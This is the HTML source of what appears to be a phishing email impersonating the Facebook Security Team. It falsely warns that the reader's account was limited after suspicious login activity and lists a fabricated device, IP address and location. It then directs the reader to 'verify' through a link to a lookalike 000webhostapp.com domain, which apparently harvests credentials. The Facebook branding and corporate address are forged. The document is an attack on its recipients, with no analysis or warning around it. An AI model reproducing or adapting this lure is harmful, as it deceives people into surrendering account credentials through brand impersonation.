<html>

<head>
<meta http-equiv="Content-Language" content="en-us">
<meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
<title>Facebook Limited Account Access</title>
</head>

<body>

<p><img border="0" src="images.png" width="101" height="96"> Facebook Limited 
Account Access </p>
<p>A suspicious activity was closely monitored from your account. After further 
investigation, we believe that someone was trying to access your account without 
your knowledge. In order to prevent such unauthorized activity, we have 
currently limited your account.</p>
<p><span style="color: #808080">Operating system:&nbsp;&nbsp;&nbsp;&nbsp; </span>
Windows</p>
<p><span style="color: #808080">Browser:&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
</span>Chrome</p>
<p><span style="color: #808080">IP address:&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
</span>71.43.82.234</p>
<p><span style="color: #808080">Estimated location:&nbsp;&nbsp;&nbsp;&nbsp;
</span>Orlando, FLORIDA, US</p>
<p>Click<a href="link.html"> <b><font size="4">here</font></b></a> to verify&nbsp; We 
shall then review your information and lift the limitations from your account. 
We apologize for any inconvenience caused.</p>
<p>Copy and Paste this link to your browser:
<a href="http://fbse-curityblockfv.000webhostapp.com/security/lockout/blockcheckpoint/link.html">
http://fbse-curityblockfv.000webhostapp.com/security/lockout/blockcheckpoint/link.html</a><font color="#0000FF">
</font></p>
<p>Thanks,<br>
The Facebook Security Team<img border="0" src="favico.png" width="21" height="16"></p>
<p>&nbsp;</p>
<p>&nbsp;<font size="1" color="#808080">This is an automated email do not reply.</font></p>
<p><font color="#808080">Facebook, Inc., Attention: Community Support, Menlo 
Park, CA 94025</font></p>
<p>&nbsp;</p>

</body>

</html>
